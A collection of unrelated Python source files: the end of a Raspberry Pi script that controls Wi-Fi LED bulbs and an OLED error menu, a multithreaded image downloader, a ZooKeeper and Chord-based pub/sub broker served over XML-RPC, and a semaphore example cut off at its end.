wifiled.setRgbw(r=r,g=g,b=b,w=w,brightness=brightnes+10)
response = None
elif selection[1] == 6:
if name == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
y = wifiled.getRgbw()
if y[0]+10 > 255 :
wifiled.setRgbw(r=255,g=y[1],b=y[2],w=y[3])
else:
wifiled.setRgbw(r=y[0]+10,g=y[1],b=y[2],w=y[3])
else:
if r+10 > 255:
wifiled.setRgbw(r=255,g=g,b=b,w=w)
else:
wifiled.setRgbw(r=r+10,g=g,b=b,w=w)
response = None
elif selection[1] == 7:
if name == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
y = wifiled.getRgbw()
if y[1]+10 > 255 :
wifiled.setRgbw(r=y[0],g=255,b=y[2],w=y[3])
else:
wifiled.setRgbw(r=y[0],g=y[1]+10,b=y[2],w=y[3])
else:
if g+10 > 255:
wifiled.setRgbw(r=r,g=255,b=b,w=w)
else:
wifiled.setRgbw(r=r,g=g+10,b=b,w=w)
response = None
elif selection[1] == 8:
if name == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
y = wifiled.getRgbw()
if y[2]+10 > 255 :
wifiled.setRgbw(r=y[0],g=y[1],b=255,w=y[3])
else:
wifiled.setRgbw(r=y[0],g=y[1],b=y[2]+10,w=y[3])
else:
if b+10 > 255:
wifiled.setRgbw(r=r,g=g,b=255,w=w)
else:
wifiled.setRgbw(r=r,g=g,b=b+10,w=w)
response = None
elif selection[1] == 9:
if name == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
y = wifiled.getRgbw()
if y[3]+10 > 255 :
wifiled.setRgbw(r=y[0],g=y[1],b=y[2],w=255)
else:
wifiled.setRgbw(r=y[0],g=y[1],b=y[2],w=y[3]+10)
else:
if w+10 > 255:
wifiled.setRgbw(r=r,g=g,b=b,w=255)
else:
wifiled.setRgbw(r=r,g=g,b=b,w=w+10)
response = None
elif selection[1] == 5:
if not selectlist + 1 > len(colorlist)-1:
selectlist = selectlist + 1
if name == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
try:
eval('wifiled.' + str(coloraction[selectlist]))
except:
print('Failed to execute : "' + str(coloraction[selectlist]) + '"')
else:
try:
eval('wifiled.' + str(coloraction[selectlist]))
except:
print('Failed to execute : "' + str(coloraction[selectlist]) + '"')
ifwantreload = 0
response = str(coloraction[selectlist])
else:
if not selection[1] + 1 > 9:
selection[1] = selection[1] + 1
if selection[1] == 4:
selection[1] = 5
else:
selection[1] = 0
elif self.buton[0] == 3 :
del self.buton[0]
if selection[0]:
if selection[1] == 0:
if name == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
if ison:
wifiled.turnOff()
response = 'turnOff()'
else:
wifiled.turnOn()
response = 'turnOn()'
else:
if ison:
wifiled.turnOff()
response = 'turnOff()'
else:
wifiled.turnOn()
response = 'turnOn()'
elif selection[1] == 1:
if name == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
y = wifiled.getRgbw()
if wifiled.brightness-10 < 0 :
wifiled.setRgbw(r=y[0],g=y[1],b=y[2],w=y[3],brightness=0)
else:
wifiled.setRgbw(r=y[0],g=y[1],b=y[2],w=y[3],brightness=wifiled.brightness-10)
else:
if brightnes-10 < 0:
wifiled.setRgbw(r=r,g=g,b=b,w=w,brightness=0)
else:
wifiled.setRgbw(r=r,g=g,b=b,w=w,brightness=brightnes-10)
response = None
elif selection[1] == 6:
if name == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
y = wifiled.getRgbw()
if y[0]-10 < 0 :
wifiled.setRgbw(r=0,g=y[1],b=y[2],w=y[3])
else:
wifiled.setRgbw(r=y[0]-10,g=y[1],b=y[2],w=y[3])
else:
if r-10 < 0:
wifiled.setRgbw(r=0,g=g,b=b,w=w)
else:
wifiled.setRgbw(r=r-10,g=g,b=b,w=w)
response = None
elif selection[1] == 7:
if name == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
y = wifiled.getRgbw()
if y[1]-10 < 0 :
wifiled.setRgbw(r=y[0],g=0,b=y[2],w=y[3])
else:
wifiled.setRgbw(r=y[0],g=y[1]-10,b=y[2],w=y[3])
else:
if g-10 < 0:
wifiled.setRgbw(r=r,g=0,b=b,w=w)
else:
wifiled.setRgbw(r=r,g=g-10,b=b,w=w)
response = None
elif selection[1] == 8:
if name == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
y = wifiled.getRgbw()
if y[2]-10 < 0 :
wifiled.setRgbw(r=y[0],g=y[1],b=0,w=y[3])
else:
wifiled.setRgbw(r=y[0],g=y[1],b=y[2]-10,w=y[3])
else:
if b-10 < 0:
wifiled.setRgbw(r=r,g=g,b=0,w=w)
else:
wifiled.setRgbw(r=r,g=g,b=b-10,w=w)
response = None
elif selection[1] == 9:
if name == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
y = wifiled.getRgbw()
if y[3]-10 < 0 :
wifiled.setRgbw(r=y[0],g=y[1],b=y[2],w=0)
else:
wifiled.setRgbw(r=y[0],g=y[1],b=y[2],w=y[3]-10)
else:
if w-10 < 0:
wifiled.setRgbw(r=r,g=g,b=b,w=0)
else:
wifiled.setRgbw(r=r,g=g,b=b,w=w-10)
response = None
elif selection[1] == 5:
if not selectlist - 1 < 0:
selectlist = selectlist - 1
if name == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
try:
eval('wifiled.' + str(coloraction[selectlist]))
except:
print('Failed to execute : "' + str(coloraction[selectlist]) + '"')
else:
try:
eval('wifiled.' + str(coloraction[selectlist]))
except:
print('Failed to execute : "' + str(coloraction[selectlist]) + '"')
ifwantreload = 0
response = str(coloraction[selectlist])
else:
if not selection[1] - 1 < 0:
selection[1] = selection[1] - 1
if selection[1] == 4:
selection[1] = 3
else:
selection[1] = 9
ifwantreload = 0
if not len(self.buton) == 0:
buton = 5
else:
buton = 0
self.veil = 0
buton = buton - 1
resoul = ['','']
if name == 'All':
resoul[0] = []
for adress in ip_wifi_led:
resoul[0].append(adress)
else:
resoul[0] = ip_wifi_led[name_wifi_led.index(name)]
if not response == None:
resoul[1] = str(response)
else:
if name == 'All':
r = 0
g = 0
b = 0
w = 0
i = 0
for adresr in listwifi:
wifiled = listwifi[adresr]
y = wifiled.getRgbw()
r = r + y[0]
g = g + y[1]
b = b + y[2]
w = w + y[3]
i = i + 1
r = round(r/i)
g = round(g/i)
b = round(b/i)
w = round(w/i)
else:
wifiled = listwifi[name]
y = wifiled.getRgbw()
r = y[0]
g = y[1]
b = y[2]
w = y[3]
if w == 0:
resoul[1] = 'setRgb(r='+str(r)+',g='+str(g)+',b='+str(b)+')'
else:
resoul[1] = 'setRgbw(r='+str(r)+',g='+str(g)+',b='+str(b)+',w='+str(w)+')'
i = len(save_list_color) - 1
while i > -1:
wifiled = led.WifiLedBulb(ip_wifi_led[i])
if save_list_color[i][4]:
wifiled.turnOn()
wifiled.setRgbw(r=save_list_color[i][0],g=save_list_color[i][1],b=save_list_color[i][2],w=save_list_color[i][3])
else:
wifiled.turnOff()
i = i - 1
return resoul
except BrokenPipeError:
self.veil = 0
print('Failed : "led strip"')
resoul = ['','']
resoul[0] = []
for adress in ip_wifi_led:
resoul[0].append(adress)
resoul[1] = 'turnOn()'
return resoul
def set_word_aff(self, i):
lines = str(i).split(" ")
conta = True
i = 0
h = []
while conta:
char = ''
charlen = 0
conti = True
while conti:
if char == '':
char = char + lines[i]
else:
char = char + ' ' + lines[i]
charlen = charlen + len(lines[i])
i = i + 1
if not len(lines)-1 < i:
if charlen + 1 + len(lines[i]) > 19:
conti = False
else:
conti = False
h.append(char)
if len(lines)-1 < i:
conta = False
image = Image.new('1', (disp.width,disp.height))
draw = ImageDraw.Draw(image)
if len(h) == 1:
draw.text(((128 - (len(h[0]) * 6)) / 2,26),h[0], font=font, fill=225)
else:
jjg = (64 - (len(h) * 12)) / len(h)
for uut in h:
draw.text((((128 - (len(uut) * 6)) / 2,jjg)),uut, font=font, fill=225)
jjg = jjg + 12
disp.image(image)
Myassistant.refrech_error()
self.veil = settings.get("Time stand by")*2+1
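# set_word_aff() above is a greedy word wrapper for the 128x64 display: the
# font is 6 px per character, so it packs at most 19 characters per line,
# centres each line horizontally and spreads the lines vertically. A minimal
# sketch of the same split with the standard library (an illustration only,
# not used by this script):
#
#     import textwrap
#     lines = textwrap.wrap(str(text), width=19)   # list of lines of <= 19 chars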
if __name__ == '__main__':
try:
Myassistant().main()
except:
errort = traceback.format_exc().split('\n')
error = errort[len(errort)-4].replace(' ','') + ': '
error = 'File ' + error.split('/')[len(error.split('/'))-1].replace('"','')
error = error + errort[len(errort)-2]
if 'KeyboardInterrupt' in error:
exit(0)
else:
print(error)
filerror = open('~/google-assistant/src/ga_error','a')
filerror.write(time.strftime("%d-%m-%Y %H:%M:%S ")+str(error)+'\n')
filerror.close()
if settings.get("Sense hat"):
Myassistant.logo_high()
Myassistant.logo_low()
if settings.get("Lcd screen"):
lines = str(error).split(" ")
conta = True
i = 0
h = []
while conta:
char = ''
charlen = 0
conti = True
while conti:
if char == '':
char = char + lines[i]
else:
char = char + ' ' + lines[i]
charlen = charlen + len(lines[i])
i = i + 1
if not len(lines)-1 < i:
if charlen + 1 + len(lines[i]) > 19:
conti = False
else:
conti = False
h.append(char)
if len(lines)-1 < i:
conta = False
image = Image.new('1', (disp.width,disp.height))
draw = ImageDraw.Draw(image)
if len(h) == 1:
draw.text(((128 - (len(h[0]) * 6)) / 2,26),h[0], font=font, fill=225)
else:
jjg = (64 - (len(h) * 12)) / len(h)
for uut in h:
draw.text((((128 - (len(uut) * 6)) / 2,jjg)),uut, font=font, fill=225)
jjg = jjg + 12
disp.clear()
Myassistant.refrech_error()
disp.image(image)
Myassistant.refrech_error()
i = 1000
while i > 0:
if GPIO.input(bsquare) == 0 or GPIO.input(bround) == 0 or GPIO.input(brigt) == 0 or GPIO.input(bleft) == 0:
i = 0
time.sleep(0.1)
i = i - 1
disp.clear()
Myassistant.refrech_error()
if i == -1:
image = Image.new('1', (disp.width,disp.height))
draw = ImageDraw.Draw(image)
draw.text((0,0), 'stop Google Assistant', font=font, fill=255)
draw.text((30,15), 'restart Google A', font=font, fill=255)
draw.text((55,30), 'shutdown RPI', font=font, fill=255)
draw.text((85,45), 'nothing', font=font, fill=255)
draw.line((5,15,5,63), fill=255)
draw.line((45,30,45,63), fill=255)
draw.line((80,45,80,63), fill=255)
draw.line((120,60,120,63), fill=255)
disp.image(image)
Myassistant.refrech_error()
i = 1000
while i > 0:
if GPIO.input(bleft) == 0:
i = -4
disp.clear()
Myassistant.refrech_error()
os.system("sudo systemctl stop google-assistant-ok-google.service")
elif GPIO.input(brigt) == 0:
i = -4
disp.clear()
Myassistant.refrech_error()
os.system("sudo systemctl restart google-assistant-ok-google.service")
elif GPIO.input(bround) == 0:
i = -4
disp.clear()
Myassistant.refrech_error()
os.system("sudo halt")
elif GPIO.input(bsquare) == 0:
i = -4
time.sleep(0.1)
i = i - 1
if not i == -5:
disp.clear()
Myassistant.refrech_error()
os.system("sudo systemctl stop google-assistant-ok-google.service")
else:
disp.clear()
Myassistant.refrech_error()
os.system("sudo systemctl stop google-assistant-ok-google.service")
|
file_download.py
|
# -*- coding: utf-8 -*-
import os
from contextlib import closing
import threading
import requests
import time
headers = {
'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'
}
# output folder
out_dir = './output'
# number of download threads
thread_num = 20
# HTTP request timeout (seconds)
timeout = 5
if not os.path.exists(out_dir):
os.mkdir(out_dir)
def download(img_url, img_name):
if os.path.isfile(os.path.join(out_dir, img_name)):
return
with closing(requests.get(img_url, stream=True, headers=headers, timeout=timeout)) as r:
rc = r.status_code
if 299 < rc or rc < 200:
print 'returnCode%s\t%s' % (rc, img_url)
return
content_length = int(r.headers.get('content-length', '0'))
if content_length == 0:
print 'size0\t%s' % img_url
return
try:
with open(os.path.join(out_dir, img_name), 'wb') as f:
for data in r.iter_content(1024):
f.write(data)
except:
print 'savefail\t%s' % img_url
def get_imgurl_generate():
with open('./final.scp', 'r') as f:
index = 0
for line in f:
index += 1
if index % 500 == 0:
print 'execute %s line at %s' % (index, time.time())
if not line:
print ur'line %s is empty "\t"' % index
continue
line = line.strip()
try:
imgs = line.split('\t')
if len(imgs) != 2:
print ur'line %s split error' % index
continue
if not imgs[0] or not imgs[1]:
print ur'line %s img is empty' % index
continue
yield imgs
except:
print ur'line %s can not split by "\t"' % index
lock = threading.Lock()
def loop(imgs):
print 'thread %s is running...' % threading.current_thread().name
while True:
try:
with lock:
img_url, img_name = next(imgs)
except StopIteration:
break
try:
download(img_url, img_name)
except:
print 'exceptfail\t%s' % img_url
print 'thread %s is end...' % threading.current_thread().name
img_gen = get_imgurl_generate()
for i in range(0, thread_num):
t = threading.Thread(target=loop, name='LoopThread %s' % i, args=(img_gen,))
t.start()
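# Alternative sketch (illustration only; the script above already fans work out
# with explicit Thread objects and a shared Lock around the generator). The
# same "many workers draining one iterable" pattern can be written with
# multiprocessing.dummy.Pool, which handles the locking internally. The helper
# below is defined but never called.
def download_all_with_pool(pairs, workers=thread_num):
    from multiprocessing.dummy import Pool  # thread-backed pool with the multiprocessing.Pool API
    pool = Pool(workers)
    pool.map(lambda pair: download(pair[0], pair[1]), pairs)
    pool.close()
    pool.join()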
|
pubsubBroker.py
|
import threading, queue
import sys, os, time
import logging
from requests import get
from xmlrpc.server import SimpleXMLRPCServer
from xmlrpc.server import SimpleXMLRPCRequestHandler
from socketserver import ThreadingMixIn
from kazoo.client import KazooClient
from kazoo.client import KazooState
from kazoo.exceptions import KazooException, OperationTimeoutError
from kazoo.protocol.paths import join
from chord_node import *
from topic import Topic, consuming_enqueue
from event import *
from zk_helpers import *
from pubsubClient import buildBrokerClient
BROKER_REG_PATH = "/brokerRegistry"
logging.basicConfig(level=logging.WARNING)
class RequestHandler(SimpleXMLRPCRequestHandler):
rpc_paths = ('/RPC2',)
class threadedXMLRPCServer(ThreadingMixIn, SimpleXMLRPCServer):
pass
class PubSubBroker:
def __init__(self, my_address, zk_hosts):
self.my_znode = ""
self.my_address = my_address
self.zk_hosts = zk_hosts
self.zk_client = KazooClient(hosts=makeHostsString(zk_hosts))
self.zk_client.add_listener(self.state_change_handler)
self.brokers = [] # array of ChordNodes representing the ChordRing
# Let Broker Control Functionality by responding to events
self.event_queue = queue.Queue()
self.operational = False # RPC method should/not accept requests
self.curr_view = 0 # view number
# Topic Responsibilities
self.primary_segment = (-1,-1)
self.replica_segment = (-1,-1)
self.temp_block_segment = (-1, -1) # chord segment that this Broker should service (View Change)
# Topic data structures
self.creation_lock = threading.Lock() # lock for when Broker needs to create a topic
self.topics = {} # dictionary - (topic: str) => Class Topic
self.pending_buffers = {} # dictionary - (topic: str) => Class Topic
# RPC Methods ==========================
def enqueue(self, topic: str, message: str):
if not self.operational:
print("Not Operational")
return False
topic_hash = chord_hash(topic)
my_job = in_segment_range(topic_hash, self.primary_segment[0], self.primary_segment[1])
blocked = in_segment_range(topic_hash, self.temp_block_segment[0], self.temp_block_segment[1])
if not my_job or blocked:
print("Not My Job ({}) or Blocked ({})".format(not my_job, blocked))
return False
# protect against contention when creating topics
if not self.topics.get(topic, None):
self.creation_lock.acquire()
if not self.topics.get(topic, None):
self.topics[topic] = Topic(topic)
self.creation_lock.release()
# atomically assigns an index to the message
message_index = self.topics[topic].publish(message)
# who are my successors
repl1, repl1_index = find_chord_successor(self.my_address, self.brokers)
repl2, repl2_index = find_chord_successor(repl1.key, self.brokers, repl1_index)
succ_one_exception = False
succ_two_exception = False
try:
if repl1.key != self.my_address:
r1Client = buildBrokerClient(repl1.key)
success_one = r1Client.broker.enqueue_replica(topic, message, message_index - 1)
except Exception as e:
succ_one_exception = True
try:
if repl2.key != self.my_address:
r2Client = buildBrokerClient(repl2.key)
success_two = r2Client.broker.enqueue_replica(topic, message, message_index - 1)
except Exception as e:
succ_two_exception = True
if succ_one_exception and succ_two_exception:
print("A PubSub Assumption Was Violated: Terminating this Broker")
exit(1)
return True
def enqueue_replica(self, topic: str, message: str, index: int):
if not self.operational:
return False
# protect against contention when creating topics
if not self.topics.get(topic, None):
self.creation_lock.acquire()
if not self.topics.get(topic, None):
self.topics[topic] = Topic(topic)
self.creation_lock.release()
broker = find_chord_successor(topic, self.brokers)
broker_rpc_client = buildBrokerClient(broker[0].key)
# attempts to move the commit point forward as aggressively as possible
consuming_enqueue(self.topics[topic], broker_rpc_client, message, index)
return True
def last_index(self, topic: str):
if not self.operational:
return -1
if not self.topics.get(topic, None):
return 0
return self.topics[topic].next_index()
def consume(self, topic: str, index: int):
if not self.operational or not self.topics.get(topic, None):
return []
return self.topics[topic].consume(index)
def get_queue(self, topic):
return self.topics[topic].messages
def get_topics(self):
return list(self.topics.keys())
def request_view_change(self, start: int, end: int):
"""This broker is being requested by another broker to perform a view change.
Other Broker (new primary) wants to take responsibility for the segment of
the chord ring [start, end].
This broker needs to lock all of the topic channels it has between start and end,
and cease taking user requests for these topics and provide the new broker with the
index of the queue that it can begin pushing messages to.
"""
logging.warning("Broker {} is blocking requests for [{},{}]".format(
self.my_address, str(start), str(end)))
# 1) Change Temp Blocked Segment Range
self.temp_block_segment = (start, end)
# 2) Fill in Topic Vector Map with Next Available Index
topic_vector = {} # Example: {"sport": 13, "politics": 98} # (topic_name, index)
for name, topic in self.topics.items():
# only add topic queues from this segment
if in_segment_range(chord_hash(name), start, end):
topic_vector[name] = topic.next_index()
return self.curr_view, topic_vector
def consume_bulk_data(self, start, end):
"""This func is called via RPC by another broker. Usually called when
a broker needs to get "up to speed" with some new topics it is
responsible for.
Returns all topic data that fall in the range of start, end
"""
# the data we want to return
data = {}
# find which belong to you
for name, topic in self.topics.items():
t_hash = chord_hash(name)
# if the hash is in your primary range
if in_segment_range(t_hash, start, end):
# add the topic data to the data to be returned
data[name] = topic.consume(0)
return data
# Control Methods ========================
def serve(self):
# start process of joining the system
self.event_queue.put(ControlEvent(EventType.RESTART_BROKER))
while True: # infinite Broker serving loop
# Wait for an event off the communication channel
# and respond to it
event = self.event_queue.get() # blocking call
if event.name == EventType.PAUSE_OPER:
self.operational = False
elif event.name == EventType.RESUME_OPER:
# Don't quite know what will need to be done in this situation
# 1) Get an updated chord ring because no guarantees that it
# is still the same since we were last connected.
# 2) This may also imply some catch up on data!
# 2) Make RPC server operational
pass
elif event.name == EventType.RESTART_BROKER:
# retry Making connection with ZooKeeper and joining the cluster
self.restart_broker()
elif event.name == EventType.RING_UPDATE:
# Take care of new updated chord ring
ring = event.data[CHORD_RING]
self.manage_ring_update(ring)
# reset watch on Broker Registry in ZooKeeper
self.zk_client.get_children(BROKER_REG_PATH, watch=self.registry_callback)
elif event.name == EventType.UPDATE_TOPICS:
segment = event.data[SEGMENT] # segment of chord ring in question
pred, _ = find_chord_predecessor(self.my_address, self.brokers)
self.perform_replica_sync(segment, pred)
elif event.name == EventType.VIEW_CHANGE:
segment = event.data[SEGMENT] # segment of chord ring in question
succ,_ = find_chord_successor(self.my_address, self.brokers)
self.perform_view_change_sync(segment, succ)
else:
logging.warning("Unknown Event detected: {}".format(event.name))
def restart_broker(self):
connected = False
while not connected:
try:
# start the client
self.zk_client.start()
connected = True
except Exception as e:
logging.warning("Join Cluster error: {}".format(e))
try:
# build chord ring for the first time
self.zk_client.ensure_path(BROKER_REG_PATH)
broker_addrs = self.zk_client.get_children(BROKER_REG_PATH)
self.brokers = create_chord_ring(broker_addrs)
except Exception as e:
logging.warning("Join Cluster error: {}".format(e))
self.event_queue.put(ControlEvent(EventType.RESTART_BROKER))
return
# TODO Request a View Change from the previous Primary
# 1) determine topic range this broker will inhabit
start, end = find_prime_chord_segment(self.my_address, self.brokers)
# 2) determine who the previous primary is
curr_primary, _ = find_chord_successor(self.my_address, self.brokers)
# 3) request view change for that keyspace
if curr_primary != None:
# set up RPC-client
broker_rpc = buildBrokerClient(curr_primary.key)
prev_view, topic_vector = broker_rpc.broker.request_view_change(start, end)
# do something with the Topic Vector
self.prepare_as_primary(topic_vector)
else:
prev_view = 0
self.curr_view = prev_view
logging.warning("Broker {} is starting view {}. Responsible for [{},{}]".format(
self.my_address, str(prev_view + 1), str(start), str(end)))
# 4) Jump into the mix by registering in ZooKeeper
self.join_cluster()
def join_cluster(self):
try:
# enable RPC requests to come through
self.operational = True
# create a watch and a new node for this broker
self.zk_client.ensure_path(BROKER_REG_PATH)
self.zk_client.get_children(BROKER_REG_PATH, watch=self.registry_callback)
my_path = BROKER_REG_PATH + "/{}".format(self.my_address)
self.my_znode = self.zk_client.create(my_path, value="true".encode("utf-8"), ephemeral=True)
except Exception as e:
logging.warning("Join Cluster error: {}".format(e))
self.operational = False
time.sleep(1)
self.event_queue.put(ControlEvent(EventType.RESTART_BROKER))
def manage_ring_update(self, updated_ring):
# Print to logs
self.curr_view += 1
formatted = ["{}".format(str(node)) for node in updated_ring]
logging.warning("Broker view {} -- Watch: {}".format(
str(self.curr_view),", ".join(formatted)))
# Detect if this broker should respond to changes in its Primary segment
# np_start => new primary start cp_start => current primary start
np_start, np_end = find_prime_chord_segment(self.my_address, updated_ring)
print(np_start, " -- ", np_end)
(cp_start, cp_end) = self.primary_segment
curr_range = segment_range(cp_start, cp_end)
new_range = segment_range(np_start, np_end)
if new_range > curr_range: # gained responsibility
if (cp_start == -1): delta_end = np_end
elif (cp_start == 0): delta_end = MAX_HASH - 1
else: delta_end = cp_start - 1
view_change = ControlEvent(EventType.VIEW_CHANGE, {SEGMENT: (np_start, delta_end)})
self.event_queue.put(view_change)
else:
self.temp_block_segment = (-1, -1)
# No need to do anything if range is smaller or the same
# Detect if this Broker should respond to changes in its Replica Segment
nr_start, nr_end = find_repl_chord_segment(self.my_address, updated_ring)
logging.warning("Repl Chord Ring segment[{}, {}]".format(
str(nr_start), str(nr_end)))
(cr_start, cr_end) = self.replica_segment
curr_range = segment_range(cr_start, cp_end) # use the whole range Replica + Primary
new_range = segment_range(nr_start, np_end) # Same here
if new_range > curr_range: # gained responsibility
if (cr_start == -1): delta_end = nr_end
elif (cr_start == 0): delta_end = MAX_HASH - 1
else: delta_end = cr_start - 1
view_change = ControlEvent(EventType.UPDATE_TOPICS, {SEGMENT: (nr_start, delta_end)})
self.event_queue.put(view_change)
# No need to do anything if range is smaller or the same
# Replace local cached copy with new ring
self.brokers = updated_ring
self.primary_segment = (np_start, np_end)
self.replica_segment = (nr_start, nr_end)
return
# Given a topic map of topics that need updating, reach out to
def prepare_as_primary(self, topics):
# Find Current Primary of the segment that you'll use to get up to date
curr_primary, _ = find_chord_successor(self.my_address, self.brokers)
rpc_primary = buildBrokerClient(curr_primary.key)
# Loop Through topics and update local topic queues
for name, global_next_index in topics.items():
self.update_topic(name, global_next_index, rpc_primary)
print("Updating topic: {} until {}".format(name, str(global_next_index)))
def update_topic(self, topic_name: str, goal_index: int, rpc_broker):
# Create Topic if it doesn't already exist
if not self.topics.get(topic_name, None):
self.creation_lock.acquire()
if not self.topics.get(topic_name, None):
self.topics[topic_name] = Topic(topic_name)
self.creation_lock.release()
# Get Next Index that this broker needs locally
my_next_index = self.topics[topic_name].next_index()
# Consume data from other broker until you've reached global next index
while goal_index > my_next_index:
partial_log = rpc_broker.broker.consume(topic_name, my_next_index)
for message in partial_log:
self.topics[topic_name].publish(message)
my_next_index = self.topics[topic_name].next_index()
def perform_view_change_sync(self, segment, successor):
if self.my_address != successor.key:
logging.warning("Broker {} is performing view change with {} for segment[{}, {}]".format(
self.my_address, successor.key, str(segment[0]), str(segment[1])))
return
def perform_replica_sync(self, segment, predecessor):
if segment[0] != -1 and segment[1] != -1:
logging.warning("Broker {} is updating replicas with {} for segment[{}, {}]".format(
self.my_address, predecessor.key, str(segment[0]), str(segment[1])))
# create rpc client
client = buildBrokerClient(predecessor.key)
# get the data
data = client.broker.consume_bulk_data(segment[0], segment[1])
# set local state - create Topic objects and add them to our dict
self.creation_lock.acquire()
for topic in data:
t_obj = Topic(topic)
t_obj.messages = data[topic]
self.topics[topic] = t_obj
#print("======\n{}\n{}\n======".format(type(self.topics[topic]), self.topics[topic]))
self.creation_lock.release()
def registry_callback(self, watch_event):
# build updated chord ring
broker_addrs = self.zk_client.get_children(BROKER_REG_PATH)
updated_ring = create_chord_ring(broker_addrs)
# send event back to Broker controller
data = {CHORD_RING: updated_ring}
event = ControlEvent(EventType.RING_UPDATE, data)
self.event_queue.put(event)
return
def state_change_handler(self, conn_state):
if conn_state == KazooState.LOST:
logging.warning("Kazoo Client detected a Lost state")
self.event_queue.put(ControlEvent(EventType.RESTART_BROKER))
elif conn_state == KazooState.SUSPENDED:
logging.warning("Kazoo Client detected a Suspended state")
self.event_queue.put(ControlEvent(EventType.PAUSE_OPER))
elif conn_state == KazooState.CONNECTED: # KazooState.CONNECTED
logging.warning("Kazoo Client detected a Connected state")
self.event_queue.put(ControlEvent(EventType.RESUME_OPER))
else:
logging.warning("Kazoo Client detected an UNKNOWN state")
def primary_topics(self):
"""Returns the list of topics this node is a primary for
"""
pt = []
for t_name in self.topics:
t_hash = chord_hash(t_name)
if in_segment_range(t_hash, self.primary_segment[0], self.primary_segment[1]):
pt.append(t_name)
return pt
def replica_topics(self):
"""Returns the list of topics this node is a replica for
"""
pt = []
for t_name in self.topics:
t_hash = chord_hash(t_name)
if in_segment_range(t_hash, self.replica_segment[0], self.replica_segment[1]):
pt.append(t_name)
return pt
def cli(self):
while True:
try:
ipt = input("\n> ")
tokens = ipt.split(" ")
cmd = tokens[0]
arg = None
if len(tokens) > 1:
arg = tokens[1]
if cmd == "pseg":
print(self.primary_segment)
elif cmd == "rseg":
print(self.replica_segment)
elif cmd == "ptop":
print(self.primary_topics())
elif cmd == "rtop":
print(self.replica_topics())
elif cmd == "topics":
val = list(self.topics.keys())
val.sort()
print(val)
elif cmd == "view":
print(self.curr_view)
elif cmd == "brokers":
print(self.brokers) # this doesn't pretty print?
elif cmd == "topic": # a specific topic
if arg:
print(self.topics[arg].messages[-10:])
else: # all the topic values
for topic in self.topics:
print("{} : {}".format(topic, self.topics[topic].messages[-10:]))
elif cmd != "": #help
hint = "Available commands\n" + \
"'pseg' -> primary segment\n" + \
"'rseg' -> replica segment\n" + \
"'ptop' -> primary topic\n" + \
"'rtop' -> replica topic\n" + \
"'topics' -> list of topics\n" + \
"'topic x' -> last 10 messages in topic 'x'\n" + \
"'view' -> current view number\n" + \
"'brokers' -> list of all brokers"
print(hint)
except Exception as e:
print("Error:", e)
# TODO cli
# - brokers in order of chord ring. Format to help viz-
# node-1 (x, y)
# node-2 (y+1, z)
# node-3 (z+1, x-1)
# Also if the terminal is getting too messy,
# redirect log output of all processes to a file and do "tail -f"
def start_broker(zk_hosts, chord_url, server_url):
ip_addr = server_url.split(":")[0]
port = int(server_url.split(":")[1])
# Create the Broker and Spin up its RPC server
rpc_server = threadedXMLRPCServer((ip_addr, port), requestHandler=RequestHandler)
broker = PubSubBroker(chord_url, zk_hosts)
# Register all functions in the Broker's Public API
rpc_server.register_introspection_functions()
rpc_server.register_function(broker.enqueue, "broker.enqueue")
rpc_server.register_function(broker.enqueue_replica, "broker.enqueue_replica")
rpc_server.register_function(broker.last_index, "broker.last_index")
rpc_server.register_function(broker.consume, "broker.consume")
rpc_server.register_function(broker.consume_bulk_data, "broker.consume_bulk_data")
rpc_server.register_function(broker.request_view_change, "broker.request_view_change")
# Hidden RPCs to support REPL debugging
rpc_server.register_function(broker.get_queue, "broker.get_queue")
rpc_server.register_function(broker.get_topics, "broker.get_topics")
# Control Broker management
service_thread = threading.Thread(target=broker.serve)
service_thread.start()
# CLI for debugging - will be messy due to log outputs
cli_thread = threading.Thread(target=broker.cli)
cli_thread.start()
# Start Broker RPC Server
rpc_server.serve_forever()
service_thread.join()
cli_thread.join()
if __name__ == "__main__":
if len(sys.argv) < 3:
print("Usage: python src/pubsubBroker.py <broker_addr> <zk_host1> <zk_host2>...")
exit(1)
print("Starting PubSub Broker...")
broker_address = sys.argv[1]
zk_hosts = sys.argv[2:]
if 'localhost' in broker_address:
public_address = broker_address
print("Using provided localhost address: {}".format(broker_address))
elif '0.0.0.0' in broker_address:
public_ip = get('https://api.ipify.org').text
port = broker_address.split(':')[1]
public_address = public_ip + ':' + port
print("Finding public address to use for clients: {}".format(broker_address))
else:
public_address = broker_address
print("Boy! I don't know what you're doing with that address, {}. I sure hope it's right!".format(broker_address))
# Display the loaded configuration
start_broker(zk_hosts, public_address, broker_address)
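# Client-side sketch (illustration; the project's real client helpers live in
# pubsubClient.py, which is not part of this file). SimpleXMLRPCServer exposes
# the dotted names registered above under the /RPC2 path, so a plain
# xmlrpc.client proxy can drive a broker directly. The host and port below are
# assumptions, not values taken from this file.
#
#     import xmlrpc.client
#     proxy = xmlrpc.client.ServerProxy("http://localhost:5000/RPC2")
#     proxy.broker.enqueue("sport", "hello subscribers")    # publish a message
#     print(proxy.broker.last_index("sport"))               # next free index in the topic
#     print(proxy.broker.consume("sport", 0))               # replay the topic from offset 0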
|
sema_signal.py
|
# sema_signal.py
#
# An example of using a semaphore to signal
import threading
import time
done = threading.Semaphore(0)
item = None
def producer():
global item
print "I'm the producer and I produce data."
print "Producer is going to sleep."
time.sleep(10)
item = "Hello"
print "Producer is alive. Signaling the consumer."
done.release()
def consumer():
print "I'm a consumer and I wait for data."
print "Consumer is waiting."
done.acquire()
print "Consumer got", item
t1 = threading.Thread(target=producer)
t2 = threading.Thread(target=consumer)
t1.start()
t2.start()
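# Alternative sketch (illustration only, nothing above calls these): the same
# one-shot signal can be expressed with threading.Event, where set() plays the
# role of done.release() and wait() the role of done.acquire().
ready = threading.Event()

def producer_with_event():
    global item
    item = "Hello"
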